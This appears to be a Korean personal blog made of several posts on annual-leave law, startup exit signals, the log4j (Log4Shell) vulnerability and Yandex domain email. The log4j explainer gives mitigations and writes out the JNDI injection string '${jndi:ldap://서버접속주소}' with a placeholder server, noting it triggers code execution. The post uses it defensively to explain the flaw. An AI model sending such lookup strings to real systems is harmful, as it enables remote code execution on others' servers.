연차사유: 개인사유

요즘엔 거의 사문화된 규정

애초에 연차에 사유가 필요한가

사유를 쓰는건 병가, 공가 등 보너스 휴가를 쓸 때 뿐이다.

너무 바쁜 기간이면 반려를 권유 할 수는 있겠지만 기본적으로 노동자의 권리이기 때문에 사용자가 거부 할 권리는 없다.

골때리는게 민주당 아니면 투표도 안 하는 사람들이
사장이나 관리자가 되면 이런걸 무시 해 버린다
민주당의 내로남불은 이렇게 시작되는걸까

연차휴가 내 맘대로 쓰면 좀 안 되나요?

Q1. 연차 쓸 때 사장님 눈치가 보여 힘들어요.
A1. 연차 사용은 법으로 보호받는 근로자의 권리!
5인 이상 사업장의 근로자라면 요건 충족 시 연차 휴가를 보장받으며, 사업주는 근로자의 연차 사용을 거부할 수 없습니다.
→ 정당한 사유 없는 거부는 근로기준법 위반으로 처벌 가능
단, ‘사업 운영에 막대한 지장이 있는 경우’ 연차 사용시기를 변경할 수 있습니다.
근로자가 청구한 연차 사용일로 사업 운영에 막대한 지장이 있는 경우, 사업주는 그 시기를 변경할 수 있습니다.
‘사업 운영에 막대한 지장이 있는 경우’란 기업의 규모, 업무의 성질, 작업의 시급성, 업무 대행의 가능성 등을 종합적으로 고려해야 합니다.
Q2. 사장님이 연차를 지금 쓰라고 강요하면 어떡하죠?
A2. 사업주가 연차 사용을 강제한다면 근로자가 이를 준수할 의무는 없습니다.
연차는 근로자가 원하는 시기에 청구하는 것으로, 근로자의 의사에 반하여 연차 사용을 강제한다면 위법 소지가 있습니다.
단, 사업주는 연차 사용 촉진 제도를 통하여 연차를 소진할 수 있습니다.
[연차 사용 촉진 제도]
ㆍ 1단계 : 미사용 연차 사용 촉구
일정 기간을 기준으로, 미사용한 연차에 대해 사용 시기 정해서 신청하도록 사업주가 서면으로 촉구
ㆍ 2단계 : 미사용 연차 사용 시기 지정
그럼에도 연차 사용 시기를 정하여 통보하지 않는 경우, 특정 기간 전까지 사업주가 휴가의 사용 시기를 정하여 근로자에게 서면으로 통보
눈치 보지 않고 연차 쓰려면 무엇보다 중요한 것은 눈치 주지 않는 회사 문화입니다!
연차유급휴가에 대해 더 궁금한 점은?
전화상담 : (국번 없이) 1350
온라인 상담 : 고용노동부 누리집 > 민원 > 민원신청 > 빠른 인터넷 상담
정책브리핑의 카드/한컷 자료는 「공공누리 제4유형 : 출처표시 + 상업적 이용금지 + 변경금지」의 조건에 따라 자유롭게 이용이 가능합니다.
[출처] 대한민국 정책브리핑(www.korea.kr)
https://www.korea.kr/news/visualNewsView.do?newsId=148901523

보너스 상식 – 연차 발생

1년미만 때 까지는
매달 만근시 1일씩 발생(총11일)
1년(=365일)을 채우고 난 다음날 15일이 발생
2년마다 연차는 1일씩 늘어나서 3년차는 16일 5년차는 17일… 25년차는 25일이 생기고
이건 최소기준이라서 회사에서 더 줄 수는 있지만 줄일수는 없다.

이게 좀 웃긴게.. .1년을 채우면 퇴직금이 생기고
1일 더 근무하면 26일의 연차가 생긴다
보통은 다 못 쓰겠지…ㅎ
80% 이상 근무하면 생기는거라서 휴가를 많이 쓰면 더 이익이기도 하다.

연차수당도 거의 월급이네 ㅋ 퇴사하는 사람 입장에서는 조금 미안할 지경…

직원 채용 할 때는 이정도가 비용이라는걸 잘 고려해서 뽑아야한다.
1년 딱 채우고 그만두지 못하게 떡을 던져주는 것도 필요.

스타트업 개발자 탈출 시그널 – !투자 못 받을 때

탈출 시그널은

  • 투자 못 받을 때도 아니고
  • 급여 밀릴 때도 아니고

여기서 더 좋은 대우를 받기 글렀다고 보일 때다

남아도 되는 경우

가능성이 있고 꽤 좋은 팀이라면 사정이 안 좋을 때도 남아있어도 된다
오히려 그럴 때 남아서 같이 살려봐야겠지

그 외의 케이스는 그냥 알 수 있다.

탈출 시그널 체크리스트

대략 아래와 비슷한 상황에 직면하게 되는 사람들이 많을건데
이 경우엔 탈출해야한다고 본다

  • 대표와 임원들 C레벨 이너써클이 존재한다?
    유리천장..
    새로운 피는 계속 안 들어올거고 너는 여기서 성장할 수 없다.
    젊은조직이라고 생각하는 조직에서도 수록 발생하기 쉬운 문제..
    임원들도 경쟁을 통해 도태되기도 해야하는데 이너써클에서 내보내는 경우는 없을거다. 너도 거기 못 들어갈거고… 그러다보면 회사의 성장도 정체되니 먹을것도 없다
    카카오처럼 정권에 끈 대면 지속 성장하기도 하지만.. 어차피 끼어들 자리는 없음
  • 본인이 생각하는 위치와 회사에서의 대접이 차이가 난다
    시니어급 이상인데 회사 정보가 전혀 공유되지 않고 업무 결정권이 없다?
    이건 애초에 나가리니까 그냥 그 상태로 다닐생각 아니면 나가야됨
    여기서 잘 생각해야 할 것은 본인이 진짜 병신인지 다른데가면 나을지
  • 스톡옵션이 없다?
    스타트업 지분이나 스톡옵션 별 것도 아니라고 하지만… 그것도 없으면… 성공해도 소용없음
    전부 다 안주면 괜찮다? 아니 이건 전부 다 나가야됨 ㅋㅋㅋ
  • 연봉협상을 안한다?
    탈출… 연봉을 못 올려줄 수는 있는데 이런경우 사정이 공유되거나 해야 정상
    이런 회사는 연봉 밀려는 것도 밀리고 나서 알 수 있다 ㅋ
    연봉은 계속 안 올려줄 가능성도 높다
  • 대표나 임원이 직원과 주기적으로 면담을 안한다(6개월에 1회이상)
    30인 이하인 경우 대표와 면담을 해야 정상이고
    그 이상인 경우 담당 임원/팀장 등 리더와 지속적으로 진행해야한다
    이거 진짜 필수
    우리회사 다 사이좋으니까 그런거 필요없어~ 라고 생각하는건 경영진이 병신인거니까 퇴사해야함. 이 회사는 성공전에 꺠짐
  • 새로 온 직원만 대접이 좋다
    이건 뭐 어떻게 대응할 수 없고 존나 억울하겠지만… 어쩔건데 ㅋ
    그러니 스톡옵션이라도 받았어야 하는 거지 ㅋ

더 다양한 지표가 있겠지만 주변에서 봤을 때 대략 이정도인데
이 경우에는 회사가 성공해도 본인은 성공하지 못할테니 얼른 탈출하는게 좋다
단, 아래 조건중 하나도 충족하는 경우에만 탈출 공식 성립

  • 다른 곳에서 더 많이 벌 수 있다
  • 더 좋은 곳으로 이직 가능
  • 창업하면 여기보다 높은 소득 가능 또는 여기보다 성장가능

위에 해당 안되면 본인은 월급루팡 중이니 그냥 다녀야함

log4j – 0 day vulnerability

logging for java – 이미 유행 좀 지났지만… 생각났던거 다시 정리
0 day vulnerability 는 개발자보다 공격자가 먼 알아낸 문제점으로
0일부터 현재까지 모든 날짜가 위험했다는 의미

참고

  • https://nakedsecurity.sophos.com/2021/12/10/log4shell-java-vulnerability-how-to-safeguard-your-servers/
  • https://blog.alyac.co.kr/4341
  • https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot
  • https://medium.com/s2wlab/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-kr-fb50a6458a08

해결법

며칠동안 난리났던 log4j 0-day vulnerability
– org.apache.logging.log4j:log4j-core:2.15.0 이하 버전에서 문제 발생
2.16으로 업글하거나
옵션값 수정 formatMsgNoLookup=true
log4j 다른 로거로 전환

log4j 다른 로거로 전환

log4j는 자바에서 제일 많이 쓰이던 로깅 라이브러리 였다?
아직도 쓰는건 대부분 레거시 시스템 아니었을까
몇 가지 의존성을 추가하면 logback등 다른 로거로 쉽게 전환이 가능게 되서
대부분 시스템은 전환이 완료되었을거다

요즘엔 로거를 별도로 구현하거나 선언하는 경우는 잘 없고
표준 로깅 인터페이스링 slf4j를 통해서 사용한다
구현체를 쉽게 교체할 수 있도록

스프의 경우 기본적으로 아래의 의존성을 가지고 있는데

implementation 'ch.qos.logback:logback-classic' // logback 기본
implementation 'org.slf4j:jul-to-slf4j' // jul 로거를 slf4j로 연결
implementation 'org.slf4j:log4j-over-slf4j' // log4j 로거를 slf4j로 연결

취약점 설명

이 취약점은 마인크래프트서버에서 처음 발견됐다고 한다
마인크래프트 채팅창에 특정 문자열을 입력하면
log4j에서 로깅하는 과정에
log.info(“user chatting {}”, chatting_message);
같은게 입력되면 jndi lookup 동작..
sql injection과 유사한 공격인데 꼭 막혀있어야 하는 부분인데 뚫려있었던게 문제

${jndi:ldap://서버접속주소}

이렇게 메시지를 보내면 코드를 실행시켜버린다.
애플리케이션이 root로 실행되고 있었다면 root도 획득 가능

무료 기업용?도메인 이메일 주소 서비스yandex

미제의 패악질을 참지 못한 불곰 형님들이 무료 도메인 서비스를 개시했다. 서비스 개 후진 양아치 네이버나 착하지만 서비스는 더 꾸진 다음하고 비교대상이 아니다.
그럭저럭 쓸만한 메일플러그와 같은 국내 서비스도 있긴한데..

회사 운영하는 것도 아니고 개인용으로 쓸만한 적당한 계정을 찾다보니 yandex라는 러시아 포탈서비스를 찾았다.

여윾시 글로벌 시대랄까…

10년후엔 아프리카 서비스를 쓰게 될지도 모르겠다.
아프리카 서비스는 유럽 제국주의자들 덕분에 편하게 쓰겠군..

사용법은… 그냥 매우 쉽다.

yandex.com 에서 가입하고
https://connect.yandex.com/pdd/
여기서 도메인 추가 해 주면 된다.

  1. TXT 관리에다가 뭐 좀 써주고
  2. MS정보랑 SRV. CNAME 써주면 완료